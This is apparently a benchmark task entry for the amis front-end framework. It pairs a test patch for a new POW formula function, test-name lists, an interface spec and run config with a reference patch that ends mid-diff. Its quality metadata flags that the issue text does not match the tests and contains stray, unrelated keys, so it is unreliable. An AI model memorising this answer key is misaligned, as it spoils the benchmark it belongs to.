new skip parameter. - Add the `POW` mathematical function to the formula engine with documentation. **Risk & Validation** - Verify that table column search no longer includes sorting parameters and that the `columnSearch` event receives correct payloads. - Test the CRUD list example to confirm mode‑based API calls and keyword search work as expected. - Run the existing test suite, especially UI rendering and formula evaluation tests, to ensure no regressions from the functional component conversion. - Manually check that translation and helper utilities still operate correctly with the added `skipFn` argument.
8,360
baidu/amis
diff --git a/packages/amis-formula/__tests__/evalute.test.ts b/packages/amis-formula/__tests__/evalute.test.ts index 4670b3906..2fb97d99a 100644 --- a/packages/amis-formula/__tests__/evalute.test.ts +++ b/packages/amis-formula/__tests__/evalute.test.ts @@ -539,3 +539,26 @@ test('evalute:ISTYPE', () => { expect(evaluate('${ISTYPE(f, "plain-object")}', data)).toBe(true); expect(evaluate('${ISTYPE(g, "date")}', data)).toBe(true); }); + +test('evalute:Math', () => { + const data = { + float: 0.5, + integer1: 2, + integer2: 4, + negativeInteger: -2, + array: [1, 2 ,3], + infinity: Infinity + } + + expect(evaluate('${POW(integer1, integer2)}', data)).toBe(16); + expect(evaluate('${POW(integer2, 0.5)}', data)).toBe(2); + expect(evaluate('${POW(integer1, -2)}', data)).toBe(0.25); + /** 计算结果不合法,则返回NaN */ + expect(evaluate('${POW(negativeInteger, 0.5)}', data)).toBe(NaN); + /** 参数值不合法,则返回基数本身*/ + expect(evaluate('${POW(array, 2)}', data)).toBe(data.array); + /** 测试Infinity */ + expect(evaluate('${POW(infinity, 2)}', data)).toBe(data.infinity); + expect(evaluate('${POW(1, infinity)}', data)).toBe(NaN); + expect(evaluate('${POW(2, infinity)}', data)).toBe(data.infinity); +})
[ "evalute:Math" ]
[ "parser:simple", "parser:complex", "parser:evalMode", "parser:template", "parser:string", "parser:number", "parser:single-string", "parser:object-literall", "parser:array-literall", "parser:variable-geter", "parser:variable-geter2", "parser:multi-expression", "parser:functionCall", "parser:filter", "parser:filter-escape", "parser:conditional", "parser:binary-expression", "parser:group-expression", "parser:unary-expression", "parser:anonymous-function", "lexer:simple", "lexer:filter", "lexer:exception", "evalute:simple", "evalute:filter", "evalute:filter2", "evalute:filter3", "evalute:filter4", "evalute:keywords", "evalute:oldVariable", "evalute:ariable2", "evalute:ariable3", "evalute:object-variable", "evalute:literal-variable", "evalute:tempalte", "evalute:literal", "evalute:variableName", "evalute:3-1", "evalate:0.1+0.2", "evalute:variable:com.xxx.xx", "evalute:anonymous:function", "evalute:anonymous:function2", "evalute:array:func", "evalute:ISTYPE", "formula:expression", "formula:expression2", "formula:expression3", "formula:if", "formula:and", "formula:or", "formula:xor", "formula:ifs", "formula:math", "formula:text", "formula:date", "formula:last", "formula:basename", "formula:customFunction" ]
Method: Evaluator.fnPOW(base: number, exponent: number) Location: packages/amis-formula/src/evalutor.ts → class Evaluator Inputs: - **base**: `number` – the base value for exponentiation. If not a number, the function returns the original `base` unchanged. - **exponent**: `number` – the exponent value. If not a number, the function returns the original `base` unchanged. Outputs: - Returns a `number` equal to `Math.pow(base, exponent)`. If the computation results in an invalid number (e.g., a negative base with a non‑integer exponent), the result is `NaN`. For non‑numeric arguments, the original `base` is returned unchanged. Description: Calculates the exponentiation of `base` raised to `exponent`. Used by the Formula evaluator when the `POW` function appears in an expression (e.g., `${POW(a, b)}`). Handles type validation and propagates `NaN` for mathematically invalid results.
custom-check-github
{ "base_image_name": "node_16", "install": [ "npm install" ], "log_parser": "parse_log_js_4", "test_cmd": "cd packages/amis-formula && npx jest --verbose --no-color" }
{ "num_modified_files": 11, "num_modified_lines": 212, "pr_author": "2betop", "pr_labels": [ "chore" ], "llm_metadata": { "code": "B1", "code_quality": null, "confidence": 0.78, "detected_issues": { "B1": true, "B2": false, "B3": false, "B4": false, "B5": false, "B6": false }, "detected_issues_explanation": null, "detecte d_issues": null, "difficulty": "medium", "external_urls": [ "https://github.com/baidu/amis/pull/8360/files?diff=unified&w=0#diff-f7780da9091a356f2349f5d0b7e7c95fbc83b5ea89ebed9e46482c91572183a5L6-R6" ], "intent_completeness": "complete", "patch": null, "pr_categories": [ "core_feat" ], "reason": null, "reasoning": "The issue describes refactoring the table header quick‑search component and removing sorting logic, but the provided test patch adds tests for a new POW function in the formula evaluator, which is unrelated to the UI change. The tests do not verify the described behavior, indicating a coupling between the test suite and unrelated code. Therefore the primary problem is a test‑suite coupling issue (B1).", "suggested_fixes": null, "test_alignment": null, "test_alignment_issues": [ "Tests target POW function in amis‑formula, while issue concerns HeadCellSearchDropDown UI refactor", "No tests verify the removal of sorting fields or the new hook‑based component" ], "test_alignment_quick_tree": null, "test_alignment_quick_tree_bootstrap": null, "test_alignment_quick_tree_mocks": null, "test_alignment_quick_tree_params": null, "test_alignment_quick_tree_unrelated": null, "test_alignment_quick_tree_use_hook": null, "test_alignment_quick_tree_use_hook_unrelated": null, "test_alignment_sample_without_replacement": null, "test_alignment_test_alignment_sample_without_replacement": null, "test_build_phylogeny": null, "test_build_phylogeny_unrelated": null, "test_build_phylogeny_use_hook": null, "test_build_phylogeny_use_hook_unrelated": null, "test_core_seq_test_sample_motif_length_1": null, "test_core_seq_test_sample_motif_length_3": null, "test_core_seq_test_sample_without_replacement": null, "test_core_sequence": null, "test_core_sequence_test_sample_motif_length_1": null, "test_core_sequence_test_sample_motif_length_3": null, "test_core_sequence_test_sample_without_replacement": null, "test_sample_motif_length_1": null, "test_sample_motif_length_3": null, "test_sample_without_replacement": null } }
79728ddad4ddfdad819d4ea6e152790ba2aa410e
2023-10-12 06:11:20
github-actions[bot]: <!-- Labeler (https://github.com/jimschubert/labeler) --> 👍 Thanks for this! 🏷 I have applied any labels matching special text in your issue. Please review the labels and make any necessary changes.
baidu__amis-8365
diff --git a/docs/zh-CN/components/table2.md b/docs/zh-CN/components/table2.md index 3443a8ef2..a3515bd8a 100755 --- a/docs/zh-CN/components/table2.md +++ b/docs/zh-CN/components/table2.md @@ -24,7 +24,8 @@ order: 67 "columns": [ { "title": "Engine", - "name": "engine" + "name": "engine", + "width": 120 }, { "title": "Version", @@ -933,8 +934,36 @@ order: 67 { "title": "Version", "name": "version", - "fixed": "left", - "width": 100 + "type": "property", + "width": 400, + "items": [ + { + "label": "cpu", + "content": "1 core" + }, + { + "label": "memory", + "content": "4G" + }, + { + "label": "disk", + "content": "80G" + }, + { + "label": "network", + "content": "4M", + "span": 2 + }, + { + "label": "IDC", + "content": "beijing" + }, + { + "label": "Note", + "content": "其它说明", + "span": 3 + } + ] }, { "title": "Browser", @@ -1969,7 +1998,7 @@ order: 67 "data":{ "rows":[ { - "engine":"Trident", + "engine":"Trident1", "browser":"Internet Explorer 4.0", "platform":"Win 95+", "version":"4", @@ -1977,7 +2006,7 @@ order: 67 "id":1, "children":[ { - "engine":"Trident", + "engine":"Trident1-1", "browser":"Internet Explorer 4.0", "platform":"Win 95+", "version":"4", @@ -1985,7 +2014,7 @@ order: 67 "id":1001, "children":[ { - "engine":"Trident", + "engine":"Trident1-1-1", "browser":"Internet Explorer 4.0", "platform":"Win 95+", "version":"4", @@ -1993,7 +2022,7 @@ order: 67 "id":10001 }, { - "engine":"Trident", + "engine":"Trident1-1-2", "browser":"Internet Explorer 5.0", "platform":"Win 95+", "version":"5", @@ -2003,7 +2032,7 @@ order: 67 ] }, { - "engine":"Trident", + "engine":"Trident1-2", "browser":"Internet Explorer 5.0", "platform":"Win 95+", "version":"5", @@ -2013,7 +2042,7 @@ order: 67 ] }, { - "engine":"Trident", + "engine":"Trident2", "browser":"Internet Explorer 5.0", "platform":"Win 95+", "version":"5", @@ -2021,7 +2050,7 @@ order: 67 "id":2, "children":[ { - "engine":"Trident", + "engine":"Trident2-1", "browser":"Internet Explorer 4.0", "platform":"Win 95+", "version":"4", @@ -2029,7 +2058,7 @@ order: 67 "id":2001 }, { - "engine":"Trident", + "engine":"Trident2-2", "browser":"Internet Explorer 5.0", "platform":"Win 95+", "version":"5", @@ -2123,6 +2152,10 @@ order: 67 "type":"table2", "source":"$rows", "columns":[ + { + "name":"id", + "title":"ID" + }, { "name":"engine", "title":"Engine" @@ -2321,6 +2354,10 @@ order: 67 "type":"table2", "source":"$rows", "columns":[ + { + "name": "id", + "title": "ID" + }, { "name":"engine", "title":"Engine" diff --git a/examples/components/CRUD/List.jsx b/examples/components/CRUD/List.jsx index 15d65c389..18aef7409 100644 --- a/examples/components/CRUD/List.jsx +++ b/examples/components/CRUD/List.jsx @@ -3,32 +3,18 @@ export default { remark: 'bla bla bla', body: { type: 'crud', - api: '/api/sample', + name: 'thelist', + api: { + method: 'get', + url: '/api/sample', + sendOn: '${mode}' + }, mode: 'list', draggable: true, saveOrderApi: { url: '/api/sample/saveOrder' }, orderField: 'weight', - filter: { - title: '条件搜索', - submitText: '', - body: [ - { - type: 'input-text', - name: 'keywords', - placeholder: '通过关键字搜索', - addOn: { - label: '搜索', - type: 'submit' - } - }, - { - type: 'plain', - text: '这只是个示例, 目前搜索对查询结果无效.' - } - ] - }, affixHeader: true, bulkActions: [ { @@ -63,6 +49,44 @@ export default { ], quickSaveApi: '/api/sample/bulkUpdate', quickSaveItemApi: '/api/sample/$id', + headerToolbar: [ + { + type: 'form', + mode: 'inline', + wrapWithPanel: false, + submitOnChange: true, + submitOnInit: true, + target: 'thelist', + body: [ + { + type: 'select', + name: 'mode', + className: 'mb-0', + selectFirst: true, + options: [ + { + label: '模式 1', + value: 'mode1' + }, + { + label: '模式 2', + value: 'mode2' + } + ] + }, + { + type: 'input-text', + name: 'keywords', + placeholder: '通过关键字搜索', + className: 'mb-0', + addOn: { + label: '搜索', + type: 'submit' + } + } + ] + } + ], listItem: { actions: [ { diff --git a/fis-conf.js b/fis-conf.js index 98590a300..fb70f4d97 100644 --- a/fis-conf.js +++ b/fis-conf.js @@ -253,7 +253,7 @@ fis.match('*.html:jsx', { // 这些用了 esm fis.match( - '{echarts/**.js,zrender/**.js,echarts-wordcloud/**.js,markdown-it-html5-media/**.js,react-hook-form/**.js,qrcode.react/**.js,axios/**.js}', + '{echarts/**.js,zrender/**.js,echarts-wordcloud/**.js,markdown-it-html5-media/**.js,react-hook-form/**.js,qrcode.react/**.js,axios/**.js,downshift/**.js,react-intersection-observer/**.js}', { parser: fis.plugin('typescript', { sourceMap: false, diff --git a/packages/amis-core/src/WithStore.tsx b/packages/amis-core/src/WithStore.tsx index 6e1c37aee..6c9a0d4b9 100644 --- a/packages/amis-core/src/WithStore.tsx +++ b/packages/amis-core/src/WithStore.tsx @@ -252,7 +252,7 @@ export function HocStoreFactory(renderer: { props.store?.storeType === 'ComboStore' ? undefined : syncDataFromSuper( - store.data, + props.data, (props.data as any).__super, (prevProps.data as any).__super, store, diff --git a/packages/amis-core/src/renderers/Form.tsx b/packages/amis-core/src/renderers/Form.tsx index 3f88f3910..e33734f60 100644 --- a/packages/amis-core/src/renderers/Form.tsx +++ b/packages/amis-core/src/renderers/Form.tsx @@ -1154,6 +1154,8 @@ export default class Form extends React.Component<FormProps, object> { if (target) { this.submitToTarget(filterTarget(target, values), values); + /** 可能配置页面跳转事件,页面路由变化导致persistKey不一致,无法清除持久化数据,所以提交成功事件之前先清理一下 */ + clearPersistDataAfterSubmit && store.clearLocalPersistData(); dispatchEvent('submitSucc', createObject(this.props.data, values)); } else if (action.actionType === 'reload') { action.target && @@ -1185,6 +1187,7 @@ export default class Form extends React.Component<FormProps, object> { ? filter(saveFailed, store.data) : undefined, onSuccess: async (result: Payload) => { + clearPersistDataAfterSubmit && store.clearLocalPersistData(); // result为提交接口返回的内容 const dispatcher = await dispatchEvent( 'submitSucc', @@ -1245,6 +1248,7 @@ export default class Form extends React.Component<FormProps, object> { }); }); } else { + clearPersistDataAfterSubmit && store.clearLocalPersistData(); // type为submit,但是没有配api以及target时,只派发事件 dispatchEvent('submitSucc', createObject(this.props.data, values)); } diff --git a/packages/amis-core/src/store/crud.ts b/packages/amis-core/src/store/crud.ts index dc2df1cc6..d254a63f5 100644 --- a/packages/amis-core/src/store/crud.ts +++ b/packages/amis-core/src/store/crud.ts @@ -61,12 +61,11 @@ export const CRUDStore = ServiceStore.named('CRUDStore') // 因为会把数据呈现在地址栏上。 return createObject( createObject(self.data, { - ...self.query, items: self.items.concat(), selectedItems: self.selectedItems.concat(), unSelectedItems: self.unSelectedItems.concat() }), - {} + {...self.query} ); }, diff --git a/packages/amis-core/src/store/table2.ts b/packages/amis-core/src/store/table2.ts index 793e8fb64..1adc52e08 100644 --- a/packages/amis-core/src/store/table2.ts +++ b/packages/amis-core/src/store/table2.ts @@ -280,12 +280,17 @@ export const TableStore2 = ServiceStore.named('TableStore2') }); } - function getRowByIndex(rowIndex: number, levels?: Array<string>): IRow2 { + function getRowByIndex( + rowIndex: number, + levels?: Array<number>, + rows?: Array<IRow2> + ): IRow2 { + rows = rows || self.rows; if (levels && levels.length > 0) { const index = +(levels.shift() || 0); - return getRowByIndex(index, levels); + return getRowByIndex(rowIndex, levels, rows[index].children); } - return self.rows[rowIndex]; + return rows[rowIndex]; } function isSelected(row: IRow2): boolean { diff --git a/packages/amis-core/src/utils/debug.tsx b/packages/amis-core/src/utils/debug.tsx index c15e9507b..8f4a23371 100644 --- a/packages/amis-core/src/utils/debug.tsx +++ b/packages/amis-core/src/utils/debug.tsx @@ -8,10 +8,12 @@ import {findDOMNode, render, unmountComponentAtNode} from 'react-dom'; // import {createRoot} from 'react-dom/client'; import {autorun, observable} from 'mobx'; import {observer} from 'mobx-react'; -import {uuidv4} from './helper'; +import {uuidv4, importLazyComponent} from './helper'; import position from './position'; -export const JsonView = React.lazy(() => import('react-json-view')); +export const JsonView = React.lazy(() => + import('react-json-view').then(importLazyComponent) +); class Log { @observable cat = ''; diff --git a/packages/amis-core/src/utils/helper.ts b/packages/amis-core/src/utils/helper.ts index ebbdfc9e8..71ddc701d 100644 --- a/packages/amis-core/src/utils/helper.ts +++ b/packages/amis-core/src/utils/helper.ts @@ -2175,3 +2175,8 @@ export function evalTrackExpression( }) .join(''); } + +// 很奇怪的问题,react-json-view import 有些情况下 mod.default 才是 esModule +export function importLazyComponent(mod: any) { + return mod.default.__esModule ? mod.default : mod; +} diff --git a/packages/amis-editor-core/src/plugin/DataDebug.tsx b/packages/amis-editor-core/src/plugin/DataDebug.tsx index b68429d0d..0e26fc97a 100644 --- a/packages/amis-editor-core/src/plugin/DataDebug.tsx +++ b/packages/amis-editor-core/src/plugin/DataDebug.tsx @@ -1,7 +1,10 @@ import {registerEditorPlugin} from '../manager'; import {BaseEventContext, BasePlugin, BasicToolbarItem} from '../plugin'; import React from 'react'; -export const JsonView = React.lazy(() => import('react-json-view')); +import {importLazyComponent} from 'amis-core'; +export const JsonView = React.lazy(() => + import('react-json-view').then(importLazyComponent) +); /** * 添加调试功能 diff --git a/packages/amis-editor/src/renderer/FormulaControl.tsx b/packages/amis-editor/src/renderer/FormulaControl.tsx index 84b6d5824..b6c03d110 100644 --- a/packages/amis-editor/src/renderer/FormulaControl.tsx +++ b/packages/amis-editor/src/renderer/FormulaControl.tsx @@ -515,21 +515,13 @@ export default class FormulaControl extends React.Component< } else { curRendererSchema.placeholder = '请输入静态值'; } - // 设置popOverContainer - if (!curRendererSchema.popOverContainer) { - curRendererSchema.popOverContainer = window.document.body; - } } JSONPipeOut(curRendererSchema); // 对 schema 进行国际化翻译 if (this.appLocale && this.appCorpusData) { - return translateSchema( - curRendererSchema, - this.appCorpusData, - (item: any) => item.__reactFiber || item.__reactProp // 在nextjs 13中,window.document.body对象,有__reactFiber,__reactProp 两个子对象,递归遍历会导致死循环,因此过滤掉 - ); + return translateSchema(curRendererSchema, this.appCorpusData); } return curRendererSchema; diff --git a/packages/amis-formula/src/doc.md b/packages/amis-formula/src/doc.md index f571ac097..37b95f335 100644 --- a/packages/amis-formula/src/doc.md +++ b/packages/amis-formula/src/doc.md @@ -268,6 +268,17 @@ 取数据最后一个。 +### POW + +用法:`POW(base, exponent)` + + * `base:number` 基数 + * `exponent:number` 指数 + +返回:`number` 基数的指数次幂 + +返回基数的指数次幂,参数base为基数,exponent为指数,如果参数值不合法则返回基数本身,计算结果不合法,则返回NaN。 + ## 文本函数 ### LEFT diff --git a/packages/amis-formula/src/doc.ts b/packages/amis-formula/src/doc.ts index c3a72cf65..5291b3029 100644 --- a/packages/amis-formula/src/doc.ts +++ b/packages/amis-formula/src/doc.ts @@ -465,6 +465,29 @@ export const doc: { }, namespace: '数学函数' }, + { + name: 'POW', + description: + '返回基数的指数次幂,参数base为基数,exponent为指数,如果参数值不合法则返回基数本身,计算结果不合法,则返回NaN。', + example: 'POW(base, exponent)', + params: [ + { + type: 'number', + name: 'base', + description: '基数' + }, + { + type: 'number', + name: 'exponent', + description: '指数' + } + ], + returns: { + type: 'number', + description: '基数的指数次幂' + }, + namespace: '数学函数' + }, { name: 'LEFT', description: '返回传入文本左侧的指定长度字符串。', diff --git a/packages/amis-formula/src/evalutor.ts b/packages/amis-formula/src/evalutor.ts index 7befa4b79..6f85541d1 100644 --- a/packages/amis-formula/src/evalutor.ts +++ b/packages/amis-formula/src/evalutor.ts @@ -13,6 +13,7 @@ import uniqBy from 'lodash/uniqBy'; import isEqual from 'lodash/isEqual'; import isPlainObject from 'lodash/isPlainObject'; import get from 'lodash/get'; +import isNumber from 'lodash/isNumber'; import {EvaluatorOptions, FilterContext, FilterMap, FunctionMap} from './types'; import {FormulaEvalError} from './error'; @@ -978,6 +979,24 @@ export class Evaluator { return arr.length ? arr[arr.length - 1] : null; } + /** + * 返回基数的指数次幂,参数base为基数,exponent为指数,如果参数值不合法则返回基数本身,计算结果不合法,则返回NaN。 + * + * @example POW(base, exponent) + * @param {number} base 基数 + * @param {number} exponent 指数 + * @namespace 数学函数 + * + * @returns {number} 基数的指数次幂 + */ + fnPOW(base: number, exponent: number) { + if (!isNumber(base) || !isNumber(exponent)) { + return base; + } + + return Math.pow(base, exponent); + } + // 文本函数 normalizeText(raw: any) { @@ -1215,6 +1234,7 @@ export class Evaluator { */ fnBEFORELAST(text: string, delimiter: string = '.') { text = this.normalizeText(text); + delimiter = this.normalizeText(delimiter); return text.split(delimiter).slice(0, -1).join(delimiter) || text + ''; } @@ -1298,6 +1318,7 @@ export class Evaluator { * @returns {string} 判断结果 */ fnSTARTSWITH(text: string, search: string) { + search = this.normalizeText(search); if (!search) { return false; } @@ -1317,6 +1338,7 @@ export class Evaluator { * @returns {string} 判断结果 */ fnENDSWITH(text: string, search: string) { + search = this.normalizeText(search); if (!search) { return false; } @@ -1336,6 +1358,7 @@ export class Evaluator { * @returns {string} 判断结果 */ fnCONTAINS(text: string, search: string) { + search = this.normalizeText(search); if (!search) { return false; } @@ -1357,8 +1380,14 @@ export class Evaluator { */ fnREPLACE(text: string, search: string, replace: string) { text = this.normalizeText(text); + search = this.normalizeText(search); + replace = this.normalizeText(replace); let result = text; + if (typeof replace === 'undefined' || !search) { + return result; + } + while (true) { const idx = result.indexOf(search); @@ -1387,11 +1416,12 @@ export class Evaluator { * @returns {number} 命中的位置 */ fnSEARCH(text: string, search: string, start: number = 0) { + search = this.normalizeText(search); text = this.normalizeText(text); start = this.formatNumber(start); const idx = text.indexOf(search, start); - if (~idx) { + if (~idx && search) { return idx; } @@ -1411,6 +1441,8 @@ export class Evaluator { */ fnMID(text: string, from: number, len: number) { text = this.normalizeText(text); + from = this.formatNumber(from); + len = this.formatNumber(len); return text.substring(from, from + len); } diff --git a/packages/amis-ui/scss/components/_table2.scss b/packages/amis-ui/scss/components/_table2.scss index 3905cf69c..57ba2dccf 100644 --- a/packages/amis-ui/scss/components/_table2.scss +++ b/packages/amis-ui/scss/components/_table2.scss @@ -527,12 +527,9 @@ color: var(--TableRow-onDisabled-color); } - > tbody - > tr:not(.#{$ns}Table-row-disabled) - > td.#{$ns}Table-cell-row-hover { - background: var(--Table-onHover-bg); - border-color: var(--Table-onHover-borderColor); - color: var(--Table-onHover-color); + > tbody > tr > td.#{$ns}Table-cell-fix-left, + > tbody > tr > td.#{$ns}Table-cell-fix-right { + background: inherit; } > thead > tr > th.#{$ns}Table-cell-fix-left-last, @@ -553,7 +550,7 @@ > thead > tr > th.#{$ns}Table-cell-fix-right-first, > tbody > tr > td.#{$ns}Table-cell-fix-right-first, - > tfoot > tr > td.#{$ns}Table-cell-fix-right-last { + > tfoot > tr > td.#{$ns}Table-cell-fix-right-first { &:after { position: absolute; top: 0; @@ -610,10 +607,6 @@ > td.#{$ns}Table-cell-fix-left { border-right: none; } - - > td.#{$ns}Table-cell-fix-left:not(.#{$ns}Table-cell-row-hover) { - background: #fff; - } } > tfoot > tr > td:not(:last-child) { @@ -644,10 +637,6 @@ > td.#{$ns}Table-cell-fix-right { border-right: none; } - - > td.#{$ns}Table-cell-fix-right:not(.#{$ns}Table-cell-row-hover) { - background: #fff; - } } } diff --git a/packages/amis-ui/src/components/table/Cell.tsx b/packages/amis-ui/src/components/table/Cell.tsx index 588571db4..c54846f86 100644 --- a/packages/amis-ui/src/components/table/Cell.tsx +++ b/packages/amis-ui/src/components/table/Cell.tsx @@ -54,7 +54,6 @@ export class BodyCell extends React.Component<Props> { style, groupId, depth, - index, col, wrapperComponent: Component, classnames: cx @@ -73,7 +72,6 @@ export class BodyCell extends React.Component<Props> { data-group-id={groupId || null} data-depth={depth || null} data-col={col} - data-index={index === -1 ? null : index} > {children} </Component> diff --git a/packages/amis-ui/src/components/table/ColGroup.tsx b/packages/amis-ui/src/components/table/ColGroup.tsx new file mode 100644 index 000000000..85cad4b03 --- /dev/null +++ b/packages/amis-ui/src/components/table/ColGroup.tsx @@ -0,0 +1,75 @@ +import React from 'react'; +import {observer} from 'mobx-react'; + +import {ColumnProps} from './index'; + +export function ColGroup({ + columns, + colWidths, + isFixed, + syncTableWidth, + initTableWidth, + showReal +}: { + columns: Array<ColumnProps>; + colWidths: { + [key: string]: { + width: number; + realWidth: number; + minWidth: number; + originWidth: number; + }; + }; + isFixed: boolean; + syncTableWidth: Function; + initTableWidth: Function; + showReal?: boolean; +}) { + const domRef = React.createRef<HTMLTableColElement>(); + + React.useEffect(() => { + if (domRef.current) { + initTableWidth(); + syncTableWidth(); + } + }, []); + + React.useEffect(() => { + const table = domRef.current!.parentElement!; + const observer = new MutationObserver(() => { + syncTableWidth(); + }); + observer.observe(table, { + attributes: true, + childList: true, + subtree: true + }); + return () => { + observer.disconnect(); + }; + }, []); + + return ( + <colgroup ref={domRef}> + {columns.map((col, index) => { + const style: any = {}; + + if (colWidths[col?.name]?.width) { + style.width = colWidths[col?.name].width; + } else if (col.width) { + style.width = col.width; + } else if (showReal) { + style.width = col.realWidth; + } + + if (!isFixed && style.width) { + style.minWidth = style.width; + } + + return <col style={style} key={index} />; + })} + </colgroup> + ); +} + +export default observer(ColGroup); diff --git a/packages/amis-ui/src/components/table/index.tsx b/packages/amis-ui/src/components/table/index.tsx index 408ccc1f9..0ea417963 100644 --- a/packages/amis-ui/src/components/table/index.tsx +++ b/packages/amis-ui/src/components/table/index.tsx @@ -9,6 +9,7 @@ import findLastIndex from 'lodash/findLastIndex'; import find from 'lodash/find'; import isEqual from 'lodash/isEqual'; import filter from 'lodash/filter'; +import debounce from 'lodash/debounce'; import intersection from 'lodash/intersection'; import Sortable from 'sortablejs'; @@ -23,6 +24,7 @@ import { guid, autobind } from 'amis-core'; +import {resizeSensor} from 'amis-core'; import {Icon} from '../icons'; import CheckBox from '../Checkbox'; import Spinner, {SpinnerExtraProps} from '../Spinner'; @@ -32,6 +34,7 @@ import HeadCellFilter from './HeadCellFilter'; import HeadCellSelect from './HeadCellSelect'; import ItemActionsWrapper from './ItemActionsWrapper'; import Cell from './Cell'; +import ColGroup from './ColGroup'; export interface ColumnProps { title: string | React.ReactNode | Function; @@ -153,6 +156,7 @@ export interface TableProps extends ThemeProps, LocaleProps, SpinnerExtraProps { rowClassName?: Function; lineHeight?: string; // 可设置large、middle固定高度,不设置则跟随内容 showHeader?: boolean; // 是否展示表头 + tableLayout?: string; // auto fixed onSelect?: Function; onSelectAll?: Function; itemActions?: Function; @@ -168,7 +172,14 @@ export interface TableState { selectedRowKeys: Array<string | number>; dataSource: Array<any>; expandedRowKeys: Array<string | number>; - colWidths: Array<number>; + colWidths: { + [name: string]: { + width: number; + realWidth: number; + minWidth: number; + originWidth: number; + }; + }; hoverRow: { rowIndex?: number; record: any; @@ -332,7 +343,8 @@ export class Table extends React.PureComponent<TableProps, TableState> { columns: [], indentSize: 15, placeholder: '暂无数据', - showHeader: true + showHeader: true, + tableLayout: 'auto' }; constructor(props: TableProps) { @@ -359,7 +371,7 @@ export class Table extends React.PureComponent<TableProps, TableState> { ? props.expandable.defaultExpandedRowKeys || [] : []) ], - colWidths: [], + colWidths: {}, hoverRow: null }; } @@ -393,6 +405,12 @@ export class Table extends React.PureComponent<TableProps, TableState> { tfootDom: React.RefObject<HTMLTableSectionElement> = React.createRef(); footDom: React.RefObject<HTMLDivElement> = React.createRef(); + toDispose: Array<() => void> = []; + updateTableInfoLazy = debounce(this.updateTableInfo.bind(this), 250, { + trailing: true, + leading: false + }); + getSelectedRows( dataSource: Array<any>, selectedRowKeys: Array<string | number> @@ -466,6 +484,7 @@ export class Table extends React.PureComponent<TableProps, TableState> { ref.current.addEventListener('wheel', this.onWheel.bind(this)) ); } + current && this.updateTableDom(current); if (this.props.draggable && this.tbodyDom?.current) { @@ -473,6 +492,12 @@ export class Table extends React.PureComponent<TableProps, TableState> { } this.updateStickyHeader(); + + const currentNode = findDOMNode(this) as HTMLElement; + + this.toDispose.push( + resizeSensor(currentNode, this.updateTableInfoLazy, false, 'width') + ); } componentDidUpdate(prevProps: TableProps, prevState: TableState) { @@ -486,7 +511,6 @@ export class Table extends React.PureComponent<TableProps, TableState> { }, () => { this.updateTableFixedRows(); - this.syncTableWidth(); } ); } @@ -570,6 +594,10 @@ export class Table extends React.PureComponent<TableProps, TableState> { if (prevProps.sticky !== this.props.sticky) { this.updateStickyHeader(); } + + if (prevProps.columns !== this.props.columns) { + this.updateTableFixedRows(); + } } componentWillUnmount() { @@ -582,6 +610,11 @@ export class Table extends React.PureComponent<TableProps, TableState> { ); this.destroyDragging(); + + this.toDispose.forEach(fn => fn()); + this.toDispose = []; + + this.updateTableInfoLazy.cancel(); } initDragging() { @@ -668,6 +701,9 @@ export class Table extends React.PureComponent<TableProps, TableState> { const children = row.children; for (let i = 0; i < children.length; i++) { const dom = children[i] as HTMLElement; + + dom.style.removeProperty('left'); + const fixed = columns[i] ? columns[i].fixed || '' : ''; if (isFixedLeftColumn(fixed)) { dom.style.left = @@ -678,11 +714,16 @@ export class Table extends React.PureComponent<TableProps, TableState> { ? getAfterRightWidth(children, i, columns) + 'px' : '0'; } + + dom.classList.remove(cx('Table-cell-fix-left-last')); + dom.classList.remove(cx('Table-cell-fix-right-first')); + dom.classList.remove(cx('Table-cell-fix-right-first-prev')); } // 最后一个左fixed的添加样式 let leftIndex = findLastIndex(columns, column => isFixedLeftColumn(column.fixed) ); + if (leftIndex > -1) { children[leftIndex]?.classList.add(cx('Table-cell-fix-left-last')); } @@ -769,18 +810,19 @@ export class Table extends React.PureComponent<TableProps, TableState> { } } - renderColGroup() { + renderColGroup(showReal?: boolean) { + const {scroll, tableLayout} = this.props; + + const isFixed = !!((scroll && scroll.x) || tableLayout === 'fixed'); return ( - <colgroup> - {this.state.colWidths.map((width: number, index: number) => { - return ( - <col - key={index} - style={{width: typeof width === 'number' ? width + 'px' : width}} - ></col> - ); - })} - </colgroup> + <ColGroup + columns={this.tdColumns} + colWidths={this.state.colWidths} + isFixed={isFixed} + syncTableWidth={this.syncTableWidth} + initTableWidth={this.initTableWidth} + showReal={showReal} + ></ColGroup> ); } @@ -789,9 +831,9 @@ export class Table extends React.PureComponent<TableProps, TableState> { this.resizeStart = event.clientX; this.resizeTarget = event.currentTarget; - const extraCount = this.getExtraColumnCount(); + const column = this.tdColumns[index]; this.resizeIndex = index; - this.resizeWidth = this.state.colWidths[extraCount + this.resizeIndex]; + this.resizeWidth = this.state.colWidths[column.name].width; this.resizeTarget!.classList.add('is-resizing'); document.addEventListener('mousemove', this.onResizeMouseMove); @@ -806,6 +848,7 @@ export class Table extends React.PureComponent<TableProps, TableState> { if (this.resizeTarget) { // 计算横向移动距离 const distance = event.clientX - this.resizeStart; + const column = this.tdColumns[this.resizeIndex]; let newWidth = 0; if (distance > 0) { newWidth = this.resizeWidth + distance; @@ -814,13 +857,12 @@ export class Table extends React.PureComponent<TableProps, TableState> { newWidth = Math.max( this.resizeWidth + distance, DefaultCellWidth, - this.tdColumns[this.resizeIndex].minWidth || 0 + column.minWidth || 0 ); } - const extraCount = this.getExtraColumnCount(); const colWidths = this.state.colWidths; - colWidths[extraCount + this.resizeIndex] = newWidth; - this.setState({colWidths: [...colWidths]}); + colWidths[column.name].width = newWidth; + this.setState({colWidths: {...colWidths}}); } event && event.stopPropagation(); } @@ -1070,7 +1112,6 @@ export class Table extends React.PureComponent<TableProps, TableState> { groupId={item.groupId} depth={item.depth} col={cIndex > -1 ? cIndex.toString() : undefined} - index={cIndex} > {typeof item.title === 'function' ? item.title(children) @@ -1117,7 +1158,7 @@ export class Table extends React.PureComponent<TableProps, TableState> { record?: any, rowIndex?: number ) { - const {classnames: cx, onRow} = this.props; + const {onRow, itemActions} = this.props; if (onRow && onRow.onRowMouseEnter) { const prevented = await onRow.onRowMouseEnter(event, record, rowIndex); @@ -1126,19 +1167,7 @@ export class Table extends React.PureComponent<TableProps, TableState> { } } - let parent = event.target; - while (parent && parent.tagName !== 'TR') { - parent = parent.parentElement; - } - - if (parent && !parent.classList.contains(cx('Table-row-disabled'))) { - for (let i = 0; i < parent.children.length; i++) { - const td = parent.children[i]; - td.classList.add(cx('Table-cell-row-hover')); // 保证有列fixed的时候样式一致 - } - } - - if (record) 